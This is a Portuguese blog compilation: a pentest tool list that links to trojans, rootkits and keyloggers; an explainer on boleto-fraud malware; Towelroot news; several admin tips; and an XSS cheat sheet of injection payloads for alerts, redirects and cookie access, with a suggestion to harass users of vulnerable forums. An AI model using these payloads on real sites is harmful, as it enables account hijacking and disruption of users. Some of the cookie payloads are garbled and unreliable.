Lista com ferramentas de segurança e pentest

No post de hoje, queria compartilhar com vocês uma versão da lista de ferramentas de segurança.

Footprinting y Fingerprinting: busca por informação

1. Anubis (Web oficial: http://flu-project.blogspot.com.es/p/herramientas-de-flu-project.html)
2. Maltego (Web oficial: http://www.paterva.com/web5/)
3. Nslookup (Información: http://es.wikipedia.org/wiki/Nslookup)
4. Dig (Información: http://en.wikipedia.org/wiki/Dig_%28Command%29)
5. Visualroute (Programa: http://visualroute.visualware.com/)
6. Whois (Programa: http://www.whois.net/)
7. Nsauditor (Web oficial: http://www.nsauditor.com/)
8. Foca (Programa: http://elevenpaths.com/lab_foca.html)
9. Httprint (Web oficial: http://www.net-square.com/httprint/)
10. Ldap Browser (Programa: http://www.ldapbrowser.com/)
11. Archieve.org (Web oficial: www.archieve.org)
12. Yougetsignal (Web oficial: www.yougetsignal.com)
13. Netcraft.com (Web oficial: www.netcraft.com)
14. Dnsstuff (Web oficial: www.dnsstuff.com)
15. Wfuzz (Información y programa: http://www.edge-security.com/wfuzz.php)
16. Nmap (Programa: http://nmap.org/download.html)
17. Zenmap (Interfaz gráfica de Nmap http://nmap.org/zenmap/)
18. Shodan (Información y servicio: http://www.shodanhq.com/)
19. Unicorn Scan (Información y programa: http://www.unicornscan.org/)
20. Satori

Aplicacões para clone de página web
1. HTTrack (http://www.httrack.com/)
2. FileStream Web Boomerang (http://www.filestream.com/webboomerang/)
3. Website Ripper Copier (http://www.tensons.com/products/websiterippercopier/)

Escáners de vulnerabilidades
1. GFI (Web oficial: http://www.gfi.com/languard/)
2. MBSA (Web oficial: http://technet.microsoft.com/es-es/security/cc184924.aspx)
3. SSS (Programa: http://www.safety-lab.com/en/products/securityscanner.htm)
4. WIKTO (Programa: http://www.baxware.com/wikto.htm)
5. ACUNETIX (Web oficial: http://www.acunetix.com/)
6. NESSUS (Web oficial: http://www.nessus.org/nessus/)
7. OpenVAS (Escaner de vulnerabilidades libre derivado de Nessus: http://www.openvas.org/)
8. RETINA (Información y programa: http://www.global-tools.com/retina.htm)
9. WEBCRUISER (Información y programa: http://sec4app.com) (Windows)
10. NIKTO (Información y programa: http://cirt.net/nikto2)
11. FLUNYMOUS (Escáner de vulnerabilidades para WordPress y Moodle: http://www.flu-project.com/downloadflu/flunym0us)
12. WP-SCAN (Información y programa: http://code.google.com/p/wpscan/)
13. PSI Secunia (http://secunia.com/products/consumer/psi/sys_req/)

Exploits 
1. Metasploit (Web oficial:http://www.metasploit.com/)
2. WinAUTOPWN (Programa: http://24.138.163.182/quaker/v2/w/winAUTOPWN_2.5.RAR)
3. Exploit-DB [Base de datos de exploits] (http://www.exploit-db.com/)

Malware 
1. FLU – (Troyano Open Source): (http://www.flu-project.com)
2. Hacker defender (Tutorial (rootkit): http://foro.elhacker.net/hacking_avanzado…html)
3. Netcat (Tutorial: http://foro.elhacker.net/tutoriales…html)
4. Crypcat (Programa: http://sourceforge.net/projects/cryptcat/)
5. Rootkit Revealer (Programa: http://sysinternals-rootkitrevealer.softonic.com/)
6. AVG AntiRootkit 1.0.0.13 (Programa: http://www.grisoft.cz/79461)
7. Ice Sword (Programa: http://icesword.softonic.com/)
8. Fu.exe (Rootkit: http://www.wisedatasecurity.com/herramientas/FU_Rootkit.zip)
9. Ikklogger 0.1 (Keylogger http://foro.elhacker.net/….html)
10. File Mon (Programa: http://technet.microsoft.com/es-es/sysinternals/bb896642.aspx)
11. Kgb Spy (Programa beta (troyano): http://kgb-spy-keylogger.softonic.com/)
12. Subseven (Troyano: http://www.vsantivirus.com/sub722.htm)

Distribuições de Linux orientadas a auditoría 
1. Wifislax (Página oficial: www.wifislax.com)
2. Wifiway (Página oficial: www.wifiway.org)
3. Backtrack (Página oficial: www.backtrack-linux.org)
4. Samurai (Página oficial: http://sourceforge.net/projects/samurai/)
5. Helix (Página oficial: http://www.e-fense.com/h3-enterprise.php)
6. Caine (Página oficial: http://www.caine-live.net/)
7. Bugtraq (Página oficial: http://www.bugtraq-team.com)
8. Kali Linux (Página oficial: http://www.kali.org)

Sniffers
1. Cain (Página oficial: http://www.oxid.it)
2. Wireshark (Página oficial: http://www.wireshark.org)
3. Ettercap (Sustituto de Cain para Linux: http://ettercap.sourceforge.net)
4. Tshark (Sniffer en modo consola del proyecto Wireshark: http://www.wireshark.org/docs/man-pages/tshark.html)
5. Evil Foca http://elevenpaths.com/lab_evil_foca.html
6. NetworkMiner http://www.netresec.com/?page=NetworkMiner

Engenharia Social
1. SET (http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29)

Ofuscadores de código
1. Eazfuscator
2. Salamander .Net Protector
3. Dotfuscator Community Edition
4. Smartassembly
5. Reactor de .NET

Analizadores de vulnerabilidades en código fonte 
1. FindBugs
2. Lapse
3. PMD

IT Security Related 
1. Open Source Vulnerability Database Search
2. US Homeland Security Threat
3. Best Security Tips

Monitoração/correlacionador de eventos 
1. Nagios
2. Zabbix

Dashboards 
1. Babel

WiFi

1. Liberar a Wifi (Descifrador de claves WiFi para Android)
2. Acrylic_WiFi
3. JavaCalcularWlan

Firewalls 
1. FluBlocker (WAF para IIS7 o superior)

Sistemas de Cibervigilancia
1. Maltego
2. ZINK-IT (http://www.zinksecurity.com/zinkit.php)

Integridade de arquivos 
1. OSIRIS
2. Pwdump7 (http://www.tarasco.org/security/pwdump_7/)
3. Samdump
4. l0phtcrack (http://www.l0phtcrack.com/)
5. Findmyhash (https://code.google.com/p/findmyhash/downloads/list)
6. WCE-Windows Credentials Editor (http://www.ampliasecurity.com/research/wcefaq.html)
7. Mimikatz (http://blog.gentilkiwi.com/mimikatz)
8. OphtCrack
9. Integrigy (http://www.integrigy.com/security-resources/downloads/lsnrcheck-tool)
10. Minasi (http://www.minasi.com/apps/)
11. Setdllcharacteristics (http://blog.didierstevens.com/2010/10/17/setdllcharacteristics/)

Engenharia Reversa
1. Olly Dbg (Programa: http://www.ollydbg.de/download.htm)
2. Radare (Programa: http://radare.org/y/)

Detectores de Man in the Middle

1. Marmita
2. XARP (Web: http://www.chrismc.de/development/xarp/)

Metadatos
1. Exiftool

Criptografía
1. TrueCrypt
2. Bitlocker
3. File Checksum Integrity Verifier-FCIV (http://www.microsoft.com/en-us/download/details.aspx?id=11533)
4. Sophos (http://www.sophos.com/es-es/products/free-tools.aspx)

Malware do Boleto

Texto do Anchises!

O portal Linha Defensiva e o Fabio Assolini, da Kaspersky, já abordaram esse tipo de golpe desde o ano passado (incluindo através de uma extensão maliciosa do Chrome ou sites que prometem gerar uma segunda via de boletos vencidos).

O jornalista Brian Krebs, em seu blog, cita o caso de uma central de controle de boleto descoberta por uma fonte dele que, indica que foram realizadas 383 transações com boletos fraudulentos entre Fevereiro e Junho deste ano, totalizando cerca de 250 mil dólares de fraude nesse período (veja abaixo o sceenshot da central de controle do malware de boleto, com a lista de transações realizadas pelo malware).

A fraude de boleto é um crime típico do cenário brasileiro, que não existe em nenhum lugar do mundo. Isso porque os boletos de pagamento são algo específicos do nosso sistema financeiro. em poucas palavras, na fraude de boleto o ciber criminoso paga boletos “seus” (em sua posse) utilizando as contas correntes de suas vítimas.

O ciber criminoso mantém uma base de boletos a serem pagos de forma fraudulenta, que podem ser boletos criados a partir de contas correntes de laranjas, ou podem ser boletos válidos (boletos enviados para consumidores finais que, na impossibilidade de pagar o total da conta, ele/ela recorre a criminosos que cobram apenas uma porcentagem do valor do boleto, e em troca o fraudador paga o valor total utilizando a conta corrente de uma vítima). A fraude com boleto válido faz com que o ciber criminoso receba o dinheiro de forma rápida e fácil, além de dificultar o rastreio da fraude: o banco consegue identificar o dono do boleto pago fraudulentamente, mas não consegue identificar o ciber criminoso.

Os ciber criminosos tem várias formas específicas para forçar o usuário final a pagar um boleto fraudulento:

  • Sites falsos de reemissão de boletos: são sites criados por ciber criminosos que prometem a revalidação de um boleto vencido. Ao fornecer os dados de seu boleto, a vítima recebe um novo código de boleto, mas que na verdade direciona o pagamento utilizando o código do boleto do fraudador;
  • Envio de boletos falsos por correio: Os criminosos podem interceptar a correspondência da vítima e substituir o boleto. Assim, a vítima recebe sua conta impressa em sua casa, mas na verdade esta conta já está com os dados de pagamento adulterados;
  • Malware de Boleto: Ele infecta o computador da vítima pode alterar os dados do boleto de três formas:
    • No pagamento de um boleto no Internet Banking: o trojan troca as informações do boleto (a linha digitável) no momento em que a vítima digita os dados no formulário de pagamento. O Browser do usuário já envia para o banco os dados do boleto fraudulento;
    • Na emissão online de boletos (ao pedir uma segunda via ou escolher fazer um pagamento com boleto): o trojan identifica uma página com dados de boleto e troca as informações pelos dados do boleto fraudulento. Eles alteram o valor da linha digitável e inserem espaços no código de barras para inutilizá-lo (assim a vítima é obrigada a digitar os dados do boleto, que já estão trocados);
    • Infectando as empresas que emitem boletos: ao infectar o compitador de uma empresa, o trojan pode fazer com que ela gere, erroneamente, boletos com os dados de pagamento já redirecionados para a conta do fraudador. O cliente já recebe em sua casa o boleto adulterado 😦

O Malware de Boleto comunica-se com o servidor central do ciber criminoso para buscar as informações do boleto que o fraudador quer pagar. Normalmente o malware mantém o valor original da conta, para que a vítima não perceba que pagou um boleto fraudulento e troca apenas o trecho da linha digitável que identifica o cedente, isto é, o destino do pagamento (afinal das contas, quem tem paciência para ficar conferindo a linha digitável dos boletos?). Mas, mesmo que a vítima quisesse comparar a linha digitável, o Malware altera a página de resposta do Internet Banking para que o usuário não perceba a alteração dos dados de pagamento.

O infográfico abaixo, criado pelo pessoal da Folha, mostra como acontece a fraude:

A fraude de boletos representa um dos métodos de roubo de fundos mais populares entre os ciber criminosos brasileiros atualmente, apesar da Febraban informar que os boletos representaram apenas 4,5% do volume de pagamentos e 3% do total de fraudes, em 2013.

Os ciber criminosos adotam mecanismos de fraude populares em um determinado país ou região em que atuam, de acordo com as características dos sistemas de meios de pagamento locais. Há vários métodos para transferir dinheiro a partir da conta corrente de uma vítima, além de uma simples transferência bancária (que pode ser facilmente rastreada). Em alguns países, é comum utilizar compra e venda de ações para transferir os fundos. Aqui no Brasil, os ciber criminosos se especializaram em explorar pagamentos de contas e de impostos, através dos boletos bancários, além de realizar compras online (em lojas de e-commerce) ou compra de créditos pré-pagos para celulares.

O que fazer para evitar a fraude de boleto? É muito difícil, mas em alguns casos não é impossível… as dicas abaixo podem ajudar um pouco:

  • Antes de mais nada, evite ser infectado por malwares!
  • E sempre utilize um computador confiável para acessar o Internet Banking;
  • Uma opção aparentemente segura é utilizar o seu smartphone para pagar boletos, uma vez que o malware só afeta PCs. Para isto, pode-se usar os aplicativos de mobile banking dos bancos;
  • Como a fraude envolve a troca dos dados do boleto, sempre verifique se você está pagando o boleto correto. Não tenha preguiça e compare o código apresentado;
  • Para saber se o seu computador está infectado pelo malware de boleto, um teste simples é digitar a linha de um boleto na tela de busca do Google; algumas versões do malware, que atuam no browser, já trocam a linha mesmo nesta tela, e aí você verá que o autocompletar vai mostrar um valor diferente do que você digitou!
  • Como os criminosos alteram os dados do boleto para enganar a vítima, para conferir um boleto que você recebeu via correio ou que gerou online, a melhor forma é conferir o código inicial do boleto que está sendo pago:
    • os 4 primeiros dígitos identificam o banco; fique de olho se corresponde ao banco que normalmente emite aquela conta que você está acostumado a pagar;
    • a primeira metade do código do boleto identifica o banco e o cedente, ou seja, é um código que identifica a empresa que emitiu aquela conta (que é um cliente daquele banco). Normalmente essa parte do código tem que ser idêntica as contas semelhantes que você pagou no passado. Confira isso ! (ex: se você paga seu aluguel via boleto, o código inicial identifica o banco e sua imobiliária, que todo mês é o mesmo).

Python para Zumbis – Curso Grátis de Python

Aew galera, curso gratis de python para quem quiser.

Quer aprender a programar com Python? Ainda dá tempo de entrar no curso (gratuito) e se juntar aos 15 mil zumbis inscritos! Ajudem a divulgar o PPZ: esta turma só termina no início de agosto. http://pycursos.com/python-para-zumbis/
https://www.youtube.com/watch?v=ioya7nGct-o

Obs1.: muitos estudantes estão entrando em férias, estou procurando aproveitar isso para divulgar a linguagem.
Obs2: o curso é atemporal, todos os vídeos e tarefas ficam disponíveis desde a primeira aula durante um semestre, teremos uma provinha baseada nos exercícios passados logo após a copa, para os interessados em um certificado (carga horária 80h).
Obs3: perdoem a duplicidade do post
Por: Fernando Masanori Ashikaga

Hacker cria app capaz de fazer root em quase todos os Androids

Houve um tempo em que o Android era fácil de ser “rootado”, mas essa não é mais uma realidade para qualquer aparelho. Pelo menos até agora, já que o hacket George Hotz, conhecido pelo apelido de “Geohot”, desenvolveu e lançou um método para destravar o Galaxy S5 das operadoras AT&T e Verizon, especialmente difíceis, mas que deve ser capaz de desbloquear qualquer aparelho.

A ferramenta se chama Towelroot e promete ser o jeito mais fácil de aplicar o root ao seu Android. Para isso, basta entrar neste site, baixar o APK e instalá-lo no celular. Em seguida, basta pressionar um único botão, que traz os dizeres “make it ra1n”. Após o término do processo, o aparelho deve estar “rootado”.

O hacker, que também é o mesmo que arrumou problemas com a Sony por rodar Linux no PlayStation 3 e também por ter criado uma ferramenta de jailbreak do iPhone em 2010, diz que o Towelroot deve funcionar com qualquer aparelho com Android 4.4.2 ou inferior, o que inclui todos os aparelhos recentes da Samsung, LG, e vários outros.

A ferramenta se baseia em uma vulnerabilidade no kernel do Linux já conhecida e corrigida nos desktops, mas que permanece no Android.

Vale observar que do ponto de vista do entusiasta do root, para ter mais liberdade na plataforma, a notícia é excelente. Do ponto de vista da segurança, nem tanto. Por ser tão simples de aplicar, o Towelroot pode ser distribuído com outros apps mal-intencionados. O root torna praticamente ilimitado o poder de um malware sobre o sistema, o que é algo realmente perigoso.

 

Site: http://towelroot.com/

Em tempos de espionagem, saiba como criptografar seu chat do Facebook (CryptoCat)

Usuários do Facebook podem utilizar a extensão para navegadores CryptoCat para iniciar conversas criptografadas com seus contatos. Para que a ferramenta funcione, é necessário que seu amigo também instale o recurso. A criptografia impede que uma conversa seja visualizada em caso de invasões da sua conta e, também, impede que elas fiquem registradas como mensagens comuns do Facebook. Veja como conversar em “segredo” na rede social e se sentir mais seguro no bate-papo.

Altere as opções de filtros de mensagens do Facebook em poucos passos (Foto: Divulgação/Facebook) (Foto: Altere as opções de filtros de mensagens do Facebook em poucos passos (Foto: Divulgação/Facebook))
Como criptografar suas conversas no chat do Facebook com o CryptoCat (Foto: Divulgação/Facebook)

 

Passo 1. Baixe a extensão para web do CryptoCat no TechTudo Downloads para Google Chrome . Instale no navegador e abra o CryptoCat em “Aplicativos”;

Fonte:Techtudo

Como descobrir o usuário logado em uma estação

Dica do meu amigo Tiago Souza

Introdução

 O Psloggedon é um utilitário da sysinternals que mostra o usuário logado em uma estação de trabalho do domínio active directory.

Conteúdo

Vamos mostrar uma prática comum no dia a dia. Precisamos verificar se um endereço de IP está sendo usado no momento, para isso executamos o PING no endereço. Exemplo, vamos pingar o endereço IP 192.168.112.170.

Já que respondeu vamos descobrir agora qual o nome DNS desse computador no domínio executando nslookup.

Agora vamos mais a fundo, quem será que está logado nessa estação de trabalho? Para isso vamos utilizar oPSLOGGEDON.

Você vai ter que executar o download da ferramenta, que é bem leve (1.60MB), para isso visite:http://technet.microsoft.com/en-us/sysinternals/bb897545.aspx  .

Depois é só executa-la uma vez e acessar o cmd para trabalhar com o comando. Estou usando o powershell por costume, mas pode ser o prompt de comando, que alguns chamam de DOS. :)

Baseado no número do computador que queremos descobrir o usuário logado digitamos:

Psloggedon nome_computador -l -x

Vejamos o help do aplicativo para entender melhor.

O que fizemos foi buscar quem está logado localmente sem mostrar a opção logon times (que pode trazer informações desnecessárias).

Esse é o método mais prático, mas se você precisa buscar pelo nome de usuário também é possivel digitando:

Psloggedon nome_usuario -l -x

Note que você tem que ter permissão nas máquinas do domínio para executar essa operação, algumas ele pode não abrir, mas veja que ele conseguiu descobrir a máquina “TIAGO”.

Se você não usar a opção “–l” ele busca logins remotos também.

Conclusão

Essa é uma ferramenta muito útil que ajuda o administrador de sistemas a encontrar em que computador os usuários do domínio estão logados.

XSS – Guia de Filtros e exemplos de Ataques

Nesta seção, vamos olhar para uma série de filtros e exemplos de XSS (Cross Site Scripting) ataques destinados a sites e penetração com vulnerabilidades XSS, espero que possa ajudar e dar ideias. Mensagem de alerta XSS Com esse código, uma mensagem de aviso será gerada em toda a página vulnerável, a mensagem é modificada:

  1. <script>alert(“XSS”);</script>  
  1. <IMG SRC=“javascript:alert(‘XSS’);”>
  1. <IMG SRC=javascript:alert(‘XSS’)>  
  1. <IMG SRC=JaVaScRiPt:alert(‘XSS’)> 
  1. <IMG SRC=javascript:alert(“XSS”)>  
  1. <IMG SRC=`javascript:alert(“RM’XSS'”)`>
  1. <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>>  
  1. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>  
  1. <IMG SRC=“jav    ascript:alert(‘XSS’);”>  
  1. <IMG SRC=“jav    ascript:alert(‘XSS’);”>  
  1. <IMG SRC=”javascript:alert(‘XSS’);”>
  1. <IMG SRC=”javascript:alert(‘XSS’);”>
  1. <IMG SRC=”   javascript:alert(‘XSS’);”> 
  1. <IMG SRC=“javascript:alert(‘XSS’)”>  
  1. <IMG DYNSRC=“javascript:alert(‘XSS’)”>  
  1. <IMG LOWSRC=“javascript:alert(‘XSS’)”> 
  1. <IMG SRC=‘vbscript:msgbox(“XSS”)’>  
  1. <DIV STYLE=“background-image: url(javascript:alert(‘XSS’))”>  
  1. <DIV STYLE=“background-image:07507206C028’06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029’029”>  
  1. <DIV STYLE=“background-image: url(javascript:alert(‘XSS’))”>  
  1. <DIV STYLE=“width: expression(alert(‘XSS’));”>  
  1. <BODY BACKGROUND=“javascript:alert(‘XSS’)”>  
  1. <BODY ONLOAD=alert(‘XSS’)>  
  1. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>  
  1. <TABLE BACKGROUND=“javascript:alert(‘XSS’)”>  
  1. <TABLE><TD BACKGROUND=“javascript:alert(‘XSS’)”>  

Uma maneira simples de tocar o nariz para os usuários é de alertas de pontuação intermináveis. Isso vai forçá-los a matar o processo do navegador, por ter muitas abas. Se isso acontece no meio de uma transação ou outro momento importante de navegação pode ser desastroso para o usuário, este método é mais eficaz no livro de visitas ou fóruns vulnerável:

Redirecionamento XSS Para realizar um redirecionamento e fazer um site inacessível, podemos tentar usar document.location, window.location, location.replace location.assign e todos geram o mesmo resultado de redirecionamento:

  1. <script>document.location.href = https://mundotecnologico.net/&#8221;;</script>  
  1. <script>window.location = https://mundotecnologico.net/&#8221;;</script>  
  1. <script>location.assign(“”http://mundotecnologico.net/””);</script>  
  1. <script>location.replace(“http://mundotecnologico.net/”);</script>  

Robo de Cookie e Sessão A través da propiedad document.cookie podemos sacar o cookie que está utilizando o usuario:

  1. <script language=“javascript”>alert(“XSS Cookie: ” + document.cookie);</script  
  1. <IMG SRC=“javascript:document.cookie=true;”>  
  1. <IMG DYNSRC=“javascript:document.cookie=true;”>  
  1. <IMG LOWSRC=“javascript:document.cookie=true;”>  
  1. <IMG STYLE=“CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>  
  1. <iframe src=”javascript:document.cookie=true;>  
  1. <INPUT TYPE=“IMAGE” SRC=“javascript:document.cookie=true;”>  
  1. <BODY BACKGROUND=“javascript:document.cookie=true;”>  
  1. <BODY ONLOAD=document.cookie=true;>  
  1. <BGSOUND SRC=“javascript:document.cookie=true;”>  
  1. <BR SIZE=“&{document.cookie=true}”>  
  1. <LINK REL=“stylesheet” HREF=“javascript:document.cookie=true;”>  
  1. <TABLE BACKGROUND=“javascript:document.cookie=true;”>  
  1. <DIV STYLE=“background-image: url(javascript:document.cookie=true;)”>  
  1. <DIV STYLE=“background-image: url(javascript:document.cookie=true;)”>  
  1. <DIV STYLE=“width: expression(document.cookie=true);”>  
  1. <STYLE TYPE=“text/javascript”>document.cookie=true;</STYLE>  
  1. <STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true“);}</STYLE><A CLASS=CrossSiteScripting></A>  
  1. <STYLE type=“text/css”>BODY{background:url(“javascript:document.cookie=true“)}</STYLE>  
  1. <iframe src=”javascript:document.cookie=true;>  
  1. <div onmouseover=“document.cookie=true;”>  
  1. <div style=“background-image: url(javascript:document.cookie=true;);”>  
  1. <div style=“width: expression(document.cookie=true;);”>  
  1. <body onload=“document.cookie=true;”>  
  1. <iframe src=”javascript:document.cookie=true;>  

Caso queira um documento com muitos outros comandos, veja abaixo:

XSS_Extra